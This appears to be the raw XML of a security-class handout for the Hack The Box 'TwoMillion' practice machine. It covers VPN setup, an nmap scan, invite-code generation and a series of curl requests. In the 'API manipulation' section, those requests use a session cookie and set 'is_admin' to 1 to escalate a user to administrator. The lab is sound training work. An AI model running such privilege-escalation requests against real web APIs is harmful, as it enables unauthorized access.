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C07EF2" w14:textId="0AED5ED4" w:rsidR="00707377" w:rsidRDefault="0093103A" w:rsidP="00707377">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>HTB 2million</w:t>
      </w:r>
      <w:r w:rsidR="003A5D81">
        <w:t>(part1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14205500" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001D1BAD">
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3769ACC1" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:r w:rsidRPr="001D1BAD">
        <w:t>Site: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="001D1BAD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://app.hackthebox.com/machines/TwoMillionLinks to an external site.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001D1BAD">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C153417" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:r w:rsidRPr="001D1BAD">
        <w:t>Machine: TwoMillion is an easy retired machine.  Retired machines have both official walkthroughs and a guided mode to help inexperienced users.  This machine is a celebration of the site reaching 2 million users, it is a throwback to the original interface and sign-up process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C373E" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:r w:rsidRPr="001D1BAD">
        <w:t>Goal: Obtain a foothold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5FF3C1" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001D1BAD">
        <w:t>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78170FB9" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:r w:rsidRPr="001D1BAD">
        <w:t>Parrot tools used: OpenVpn, Firefox, Nmap, Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C31987" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001D1BAD">
        <w:t>Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B72A7C" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="001D1BAD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">New to </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="001D1BAD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>HTBLinks</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="001D1BAD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> to an external site.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001D1BAD">
        <w:t>.  We will use machines in "HTB Labs".  "HTB Academy" has great resources for learning, but it is not used in this class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E593BD" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1BAD">
        <w:t>Start an OpenVpn session.  This is required to spawn the TwoMillion machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D619872" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1BAD">
        <w:t>Go to machines -&gt; retired -&gt; search TwoMillion.  Spawn the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342235A4" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1BAD">
        <w:t>Select guided mode.  This will ask a set of questions to help you stay on the right path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F70A175" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1BAD">
        <w:t>Create an account on the TwoMillion website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEEC6EB" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001D1BAD">
        <w:t>Submission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6951EECC" w14:textId="77777777" w:rsidR="001D1BAD" w:rsidRPr="001D1BAD" w:rsidRDefault="001D1BAD" w:rsidP="001D1BAD">
      <w:r w:rsidRPr="001D1BAD">
        <w:t>Upload to Canvas docx/pdf with a screenshot showing the 2million.htb home page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640745E9" w14:textId="77777777" w:rsidR="0018204B" w:rsidRDefault="0018204B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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E4A7AA" w14:textId="77777777" w:rsidR="0018204B" w:rsidRDefault="0018204B" w:rsidP="000D0F7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACA0110" w14:textId="01C3660E" w:rsidR="0018204B" w:rsidRDefault="00BA5CD8" w:rsidP="0018204B">
      <w:r>
        <w:t>This lab was split in two because</w:t>
      </w:r>
      <w:r w:rsidR="000833A9">
        <w:t xml:space="preserve"> for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> many in the class</w:t>
      </w:r>
      <w:r w:rsidR="000833A9">
        <w:t xml:space="preserve"> this will be </w:t>
      </w:r>
      <w:r w:rsidR="00836E67">
        <w:t>their</w:t>
      </w:r>
      <w:r w:rsidR="000833A9">
        <w:t xml:space="preserve"> first use of HTP and OpenVPN.</w:t>
      </w:r>
      <w:r w:rsidR="006E1C3A">
        <w:t xml:space="preserve">  Be sure you have firm grasp of </w:t>
      </w:r>
      <w:r w:rsidR="00907DEA">
        <w:t>connecting to HTB and spawning machines.</w:t>
      </w:r>
      <w:r w:rsidR="00547366">
        <w:t xml:space="preserve">  I </w:t>
      </w:r>
      <w:r w:rsidR="00836E67">
        <w:t>will cover</w:t>
      </w:r>
      <w:r w:rsidR="00547366">
        <w:t xml:space="preserve"> the basics before </w:t>
      </w:r>
      <w:r w:rsidR="001518AE">
        <w:t>you start the lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2831DD93" w14:textId="12313397" w:rsidR="00BF0F9F" w:rsidRPr="009759F9" w:rsidRDefault="00355B03" w:rsidP="0018204B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009759F9">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Stop t</w:t>
      </w:r>
      <w:r w:rsidR="00BF0F9F" w:rsidRPr="009759F9">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>he HTB walkt</w:t>
      </w:r>
      <w:r w:rsidRPr="009759F9">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">hrough when you </w:t>
      </w:r>
      <w:r w:rsidR="003B693B" w:rsidRPr="009759F9">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="009759F9">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD3125" w:rsidRPr="009759F9">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">login </w:t>
      </w:r>
      <w:r w:rsidR="009759F9" w:rsidRPr="009759F9">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>and see the 2million home page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055888F4" w14:textId="494C5EFB" w:rsidR="006F6E3C" w:rsidRDefault="006F6E3C" w:rsidP="000D0F7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA31A96" w14:textId="7044147E" w:rsidR="001E1D0D" w:rsidRDefault="00855380" w:rsidP="001E1D0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Download OpenVPN con</w:t>
      </w:r>
      <w:r w:rsidR="00F1562B">
        <w:t>figuration file “.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F1562B">
        <w:t>ovpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F1562B">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016B275A" w14:textId="77CDD05F" w:rsidR="00F1562B" w:rsidRDefault="00F1562B" w:rsidP="00F1562B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DBFCD3D" wp14:editId="55533860">
            <wp:extent cx="6858000" cy="5754370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1184813454" name="Picture 1" descr="Hack The Box :: Machines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813454" name="Picture 1184813454" descr="Hack The Box :: Machines - Google Chrom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F8162" w14:textId="333A8307" w:rsidR="00DC04D2" w:rsidRDefault="00DC04D2" w:rsidP="00F1562B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66C177D6" wp14:editId="7DA00F82">
            <wp:extent cx="6858000" cy="5754370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1123977463" name="Picture 2" descr="Hack The Box :: Machines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977463" name="Picture 1123977463" descr="Hack The Box :: Machines - Google Chrom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1FC63" w14:textId="28953765" w:rsidR="003B738F" w:rsidRDefault="005D6FA8" w:rsidP="00F1562B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F7AEB2A" wp14:editId="29E17FAC">
            <wp:extent cx="6858000" cy="5754370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2119966363" name="Picture 4" descr="Hack The Box :: Machines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966363" name="Picture 2119966363" descr="Hack The Box :: Machines - Google Chrom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E2E8D" w14:textId="61130AB7" w:rsidR="005D6FA8" w:rsidRDefault="0027205A" w:rsidP="00F1562B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="328F029F" wp14:editId="51AFCC5F">
            <wp:extent cx="6858000" cy="5754370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="523464108" name="Picture 5" descr="Hack The Box :: Hack The Box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64108" name="Picture 523464108" descr="Hack The Box :: Hack The Box - Google Chrom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6FD15" w14:textId="1839D358" w:rsidR="0027205A" w:rsidRDefault="004376F5" w:rsidP="00F1562B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D6DA005" wp14:editId="722192E7">
            <wp:extent cx="6858000" cy="4114800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="211128740" name="Picture 1" descr="Parrot OS Security Edition [Running] - Oracle VM Virtual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28740" name="Picture 211128740" descr="Parrot OS Security Edition [Running] - Oracle VM VirtualBox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326D7" w14:textId="76CF36EB" w:rsidR="003A1C3C" w:rsidRDefault="009F6F10" w:rsidP="00F1562B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="067ADD12" wp14:editId="58152923">
            <wp:extent cx="6858000" cy="4114800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1723844577" name="Picture 2" descr="Parrot OS Security Edition [Running] - Oracle VM Virtual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844577" name="Picture 1723844577" descr="Parrot OS Security Edition [Running] - Oracle VM VirtualBox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05BED" w14:textId="77B1AACA" w:rsidR="009F6F10" w:rsidRDefault="009F6F10" w:rsidP="00F1562B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F1FE38" wp14:editId="2CD3E56C">
            <wp:extent cx="6195597" cy="5357324"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1779575004" name="Picture 3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575004" name="Picture 3" descr="A screenshot of a computer scree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597" cy="535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89C1B" w14:textId="77777777" w:rsidR="009F6F10" w:rsidRDefault="009F6F10" w:rsidP="00F1562B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16178B53" w14:textId="48278631" w:rsidR="007107A3" w:rsidRDefault="00BB5376" w:rsidP="00C723AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5376">
        <w:t>echo '10.10.10.11 2million.htb' | sudo tee -a /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5376">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5376">
        <w:t>/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BBBC96" w14:textId="5413C72A" w:rsidR="00436FCD" w:rsidRDefault="008E6F9C" w:rsidP="00436FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6F9C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6F9C">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6F9C">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6F9C">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6F9C">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6F9C">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6F9C">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6F9C">
        <w:t xml:space="preserve"> 2million.ht</w:t>
      </w:r>
      <w:r w:rsidR="00436FCD">
        <w:t>b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B56F14" w14:textId="1DEAB5D6" w:rsidR="00740EA7" w:rsidRDefault="00740EA7" w:rsidP="00436FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Invite code</w:t>
      </w:r>
      <w:r w:rsidR="006C69FF">
        <w:t xml:space="preserve"> shortcut.  GO </w:t>
      </w:r>
      <w:r w:rsidR="0090243F">
        <w:t>THROUGH THE HTB WALKTHROUGH STEPS WITH CLASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D15150" w14:textId="6F7812B3" w:rsidR="00740EA7" w:rsidRDefault="00740EA7" w:rsidP="00740EA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00740EA7">
        <w:t>curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00740EA7">
        <w:t>sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00740EA7">
        <w:t xml:space="preserve"> POST http://2million.htb/api/v1/invite/generate | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00740EA7">
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47450E30" w14:textId="57C4B8D3" w:rsidR="00236D9D" w:rsidRDefault="00236D9D" w:rsidP="00740EA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00236D9D">
        <w:t>echo "TUJGS04tRkhYWVMtNEE3UTUtT0RZVkI=" | base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C67512A" w14:textId="2F5D8041" w:rsidR="00E332ED" w:rsidRDefault="00E332ED" w:rsidP="00C173CA">
      <w:r>
        <w:t xml:space="preserve">AFTER LOGGING IN </w:t>
      </w:r>
      <w:r w:rsidR="00CD7A9B">
        <w:t>STOP</w:t>
      </w:r>
      <w:r w:rsidR="00FE0870">
        <w:t xml:space="preserve"> THIS LAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A79504" w14:textId="5D90529C" w:rsidR="00C173CA" w:rsidRDefault="00CD7A9B" w:rsidP="00C173CA">
      <w:r>
        <w:t xml:space="preserve">THE </w:t>
      </w:r>
      <w:r w:rsidR="00ED4CA1">
        <w:t xml:space="preserve">REST OF </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTB WALKTHROUGH </w:t>
      </w:r>
      <w:r w:rsidR="00ED4CA1">
        <w:t>IS FOR THE NEXT LAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D94720" w14:textId="60F11D94" w:rsidR="00236D9D" w:rsidRDefault="004C33E2" w:rsidP="00740EA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>fill in</w:t>
      </w:r>
      <w:r w:rsidR="002B2368">
        <w:t xml:space="preserve"> webpage</w:t>
      </w:r>
      <w:r w:rsidR="009D7633">
        <w:t>, grab the PHPSESSID cookie value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C1D092" w14:textId="7730B6BF" w:rsidR="00AD612E" w:rsidRDefault="001044BA" w:rsidP="00AD612E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="00CA0B91">
        <w:t xml:space="preserve"> manipulation</w:t>
      </w:r>
      <w:r w:rsidR="006C70C7">
        <w:t xml:space="preserve"> (shell commands</w:t>
      </w:r>
      <w:r w:rsidR="00FF4836">
        <w:t xml:space="preserve"> from walkthrough</w:t>
      </w:r>
      <w:r w:rsidR="006C70C7">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B81B6EE" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>PHP_COOKIE="PHPSESSID=qgr6gba543dnl1omnab8qv67lf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A53AAFE" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D3A6A6" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2million.htb/api --cookie $PHP_COOKIE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ACCFA7" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">curl 2million.htb/api/v1 --cookie $PHP_COOKIE | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00A6E6A1" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">curl http://2million.htb/api/v1/admin/auth --cookie $PHP_COOKIE | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DEA615E" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie $PHP_COOKIE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A61EF0" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">curl -v -X PUT http://2million.htb/api/v1/admin/settings/update --cookie $PHP_COOKIE | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56FDA8D4" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -v -X PUT http://2million.htb/api/v1/admin/settings/update --cookie $PHP_COOKIE --header "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C42A1AF" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03419A28" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -X PUT http://2million.htb/api/v1/admin/settings/update --cookie $PHP_COOKIE --header "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" --data '{"email":"test@test.com"}' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06C3B35F" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC4F7E4" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -X PUT http://2million.htb/api/v1/admin/settings/update --cookie $PHP_COOKIE --header "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" --data '{"email":"test@test.com", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is_admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": 1}' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B66AF06" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D555588" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">curl http://2million.htb/api/v1/admin/auth --cookie $PHP_COOKIE | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
